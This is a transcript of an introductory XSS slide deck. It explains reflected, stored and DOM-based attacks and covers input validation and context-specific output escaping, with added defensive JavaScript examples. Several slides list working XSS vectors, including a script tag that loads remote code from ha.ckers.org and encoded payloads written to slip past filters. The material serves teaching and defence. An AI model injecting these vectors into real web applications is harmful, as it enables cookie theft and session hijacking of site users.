Cross Site Scripting (XSS)

Xss 101 by-sai-shanthan

Jan 24, 2015

Raghunath G

Transcript
Page 1: Xss 101 by-sai-shanthan

Cross Site Scripting (XSS)

Page 2: Xss 101 by-sai-shanthan

What is XSS ?

Cross Site Scripting

- XSS is a vulnerability in websites or web applications that allows malicious users (attackers) to insert their own client-side code (normally JavaScript) into those web pages.

- When that injected code is rendered together with the original page in the web client (browsers such as IE, Firefox etc.), it runs with the page's own origin, so the attacker's script can read and modify that page exactly as the site's own scripts could.

Page 3: Xss 101 by-sai-shanthan

Negative effects of XSS

- stealing other users' cookies
- stealing their private information
- performing actions on behalf of other users
- redirecting to other websites
- showing ads in hidden IFRAMEs and pop-ups

Page 4: Xss 101 by-sai-shanthan

Types of XSS attack

- Non-persistent (Reflected)
- Persistent (Stored)
- DOM Based

Page 5: Xss 101 by-sai-shanthan

Non-persistent

- The XSS payload travels in the request and is only echoed back in the response to the same user; it is not saved in persistent storage such as a database.

- This type is considered less harmful because nothing is stored: by default the attacker only sees their own cookies and only alters the page they currently have open. To hit another user the attacker has to make that user send the payload themselves, typically by tricking them into following a crafted link, so reflected XSS is still exploitable, just not self-propagating.

Page 6: Xss 101 by-sai-shanthan

Vector : %u3008script%u3009alert(document.domain);%u3008/script%u3009

(The %uXXXX sequences are non-standard percent-encodings of U+3008 and U+3009, the CJK angle brackets, standing in for < and >; the vector only works where the server decodes %u escapes and then normalises those characters to ASCII angle brackets.)

Page 7: Xss 101 by-sai-shanthan

Persistent XSS

- In a persistent XSS attack the payload is saved in persistent storage such as a database along with other data, and is then served to every other user who views that data.

- This type is more dangerous because the attacker's script runs in the browser of every visitor: it can steal their cookies and modify the page they see without any further interaction from the attacker.

Page 8: Xss 101 by-sai-shanthan

Vector:

<b onmouseover=alert(/000/);>Click me!</b>

Page 9: Xss 101 by-sai-shanthan

DOM based attack

- DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim's browser used by the original client-side script, so that the client-side code runs in an unexpected manner.

- That is, the page itself (the HTTP response, that is) does not change, but the client-side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment. A typical source is a value the page reads from location.hash or location.search and writes into the document with innerHTML or document.write; because a URL fragment never reaches the server, a server-side filter cannot see the payload at all.

Page 10: Xss 101 by-sai-shanthan

Vector:

#"><img src=x onerror=prompt(1);>

(The payload sits in the URL fragment after #, which the browser never sends to the server; the leading "> is meant to close a quoted attribute and its tag when the page's script inserts the fragment value into markup unescaped.)

Page 11: Xss 101 by-sai-shanthan

Prevention

Never trust the user input data

No matter where it's coming from (GET, POST, COOKIE etc.).

Page 12: Xss 101 by-sai-shanthan

Validation at server

- By sanitizing the input data we can prevent malicious code from entering the system.

- Checking the proper data types helps in cleaning the data. First of all we should restrict numeric fields to numeric data, and text fields to only alphanumeric characters where that is acceptable.

- White lists – allow <strong>, <em> and <br> only. This does help, but is not 100%: the allowed tags still need their attributes restricted, and input validation does not remove the need to escape on output.

- Blacklists – block <script> and attributes such as onload, onclick, onmouseover etc. A blacklist only catches what it names, so any tag, handler, encoding or case variation it does not list passes straight through; this is the weakest option.

Page 13: Xss 101 by-sai-shanthan

Demo: Bypassing Blacklist WAF

Page 14: Xss 101 by-sai-shanthan

Validation at client side

- Performing client side (JavaScript) validation before submitting the data to the server helps only with the usability of the website.

- It can't provide any actual security, because the user can disable JavaScript, or simply send the request without the browser at all (for example through an intercepting proxy or curl). Many JavaScript libraries and frameworks are available for this kind of validation.

Page 15: Xss 101 by-sai-shanthan

Escaping output at server

Problem characters include & < > " and ' (and \ once the data lands inside a JavaScript string). These characters can be replaced with HTML character entities. For example, < can be replaced with &lt;. Which characters are dangerous, and which encoding neutralises them, depends on where in the page the data is inserted, hence the rules below.

5 Rules for escaping output

#1 - HTML Escape before inserting into element content
#2 - Attribute Escape before inserting into attributes
#3 - JavaScript Escape before inserting into JavaScript data values
#4 - CSS Escape before inserting into style property values
#5 - URL Escape before inserting into URL attributes
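An added example (not code from the deck) implementing the five rules in JavaScript and applying them to a page that reflects one parameter into element content, an attribute, a URL and a JavaScript string, which is also the breakout the DOM vector on the earlier slide relies on. The template, the function names (escapeHtml, escapeAttr, escapeJs, escapeCss, escapeUrlParam, renderUnsafe, renderSafe, countScriptTags) and the constructed inputs are this example's own, although the inputs reuse the deck's reflected and DOM vectors.

```javascript
// Added example for this page (not code from the deck): the five escaping
// contexts from the slide as small functions, and a reflected-XSS shaped page
// rendered first without and then with context-appropriate escaping.

// #1 HTML element content: the characters HTML itself gives meaning to,
// plus '/' which OWASP also recommends encoding.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// #2 attribute values: encode every character that is not [A-Za-z0-9] as
// &#xHH;. Still quote the attribute; this then holds even if it is not.
function escapeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => '&#x' + c.codePointAt(0).toString(16).toUpperCase() + ';');
}

// #3 JavaScript string data values: \xHH (or \u{...}) so the value can neither
// close the surrounding quote nor contain a literal </script>.
function escapeJs(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    return cp < 0x100 ? '\\x' + cp.toString(16).padStart(2, '0')
                      : '\\u{' + cp.toString(16) + '}';
  });
}

// #4 CSS property values: \HH followed by a space (CSS hex escape syntax).
function escapeCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => '\\' + c.codePointAt(0).toString(16) + ' ');
}

// #5 URL parameter values: percent-encode before placing them in a URL
// attribute. This protects a *parameter*; when the whole URL comes from the
// user, javascript: and similar schemes must be rejected separately.
function escapeUrlParam(s) {
  return encodeURIComponent(String(s));
}

// A page that reflects one parameter into four contexts, unescaped.
function renderUnsafe(name) {
  return '<p title="' + name + '">Hello ' + name + '</p>' +
         '<a href="/u?name=' + name + '">profile</a>' +
         '<script>var who = \'' + name + '\';</script>';
}

// The same page with the matching escaper applied in each context.
function renderSafe(name) {
  return '<p title="' + escapeAttr(name) + '">Hello ' + escapeHtml(name) + '</p>' +
         '<a href="/u?name=' + escapeUrlParam(name) + '">profile</a>' +
         '<script>var who = \'' + escapeJs(name) + '\';</script>';
}

// Number of <script> opening tags in rendered markup; the template itself
// contains exactly one, so anything above that was injected.
function countScriptTags(html) {
  return (html.match(/<script>/g) || []).length;
}

// Constructed inputs: the deck's reflected and DOM vectors plus two aimed at
// the JavaScript string context.
const PAYLOADS = [
  '<script>alert(document.domain);</script>',
  '"><img src=x onerror=prompt(1);>',
  "';alert(1)//",
  '</script><script>alert(1)</script>',
];

for (const p of PAYLOADS) {
  console.log(JSON.stringify(p));
  console.log('  unsafe <script> count:', countScriptTags(renderUnsafe(p)),
              ' safe <script> count:', countScriptTags(renderSafe(p)));
}
```

Note that escapeHtml alone would not have saved the JavaScript string context: `';alert(1)//` contains no HTML-significant character except the quote, and a `&#x27;` inside a script block is just seven literal characters to the JavaScript parser, so the data would be wrong rather than exploitable, while `</script>` in that same context needs the `<` encoded as `\x3c` to stop the HTML parser closing the block early.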

Page 16: Xss 101 by-sai-shanthan

XSS vectors

- <IMG SRC=javascript:alert('XSS')>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <IMG SRC=javascript:alert(&quot;XSS&quot;)>
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(The last entry is javascript:alert('XSS') written entirely as decimal HTML character references. The javascript: scheme in IMG SRC and the backtick-quoted form only executed in old browsers, but they remain good illustrations of why any filter has to look at the decoded value, not the raw bytes.)
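Added example (written for this page, not part of the deck) showing how a server-side check can decode the numeric character references used in the last vector above before inspecting a URL attribute, and why the check must also drop tab/newline characters and leading control characters the way browsers do. The helper names decodeEntities and isJavascriptUrl, the NAMED table and the sample inputs are this example's own.

```javascript
// Added example for this page (not from the deck): decode HTML character
// references so a filter sees what the browser will see, then classify the
// resulting URL scheme the way a browser does.

// Named references a javascript: URL is likely to hide behind; the numeric
// forms are handled generically.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', Tab: '\t', NewLine: '\n' };

// Decodes decimal (&#106;), hexadecimal (&#x6A;) and the named references
// above. Browsers accept references without the trailing ';' in many
// positions, so the ';' is optional here too. Unknown names are left as-is.
function decodeEntities(s) {
  return String(s).replace(/&(#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, _all, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
  });
}

// Normalises an attribute value the way a browser does before it dispatches
// on the URL scheme: decode references, remove ASCII tab/newline/CR anywhere,
// strip leading C0 controls and spaces, then compare case-insensitively.
function isJavascriptUrl(attrValue) {
  const decoded = decodeEntities(attrValue)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+/, '');
  return /^javascript:/i.test(decoded);
}

// Constructed inputs: the deck's entity-encoded vector, two obfuscations that
// survive a naive startsWith('javascript:') check, and two benign URLs.
const SAMPLES = [
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;',
  'jav&#x0A;ascript:alert(1)',
  "&#14;  javascript:alert('XSS')",
  'http://example.com/?q=&lt;b&gt;',
  '/relative/path',
];

for (const s of SAMPLES) {
  console.log(isJavascriptUrl(s) ? 'BLOCK ' : 'allow ', JSON.stringify(s), '->', JSON.stringify(decodeEntities(s)));
}
```

A naive `value.startsWith('javascript:')` on the raw attribute misses all three malicious samples: the first is entirely references, the second hides a newline inside the scheme name, and the third leads with a control character and spaces. Decoding, then stripping the same characters the browser strips, collapses all three to the same scheme.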

Page 17: Xss 101 by-sai-shanthan

References

http://en.wikipedia.org
http://ha.ckers.org/xss.html
http://www.bugsheet.com/cheat-sheets/100-xss-vectors-by-ashar-javed
http://www.acsa-admin.org/openconf2008/modules/request.php?module=oc_program&action=view.php&id=104

Page 18: Xss 101 by-sai-shanthan

Thank you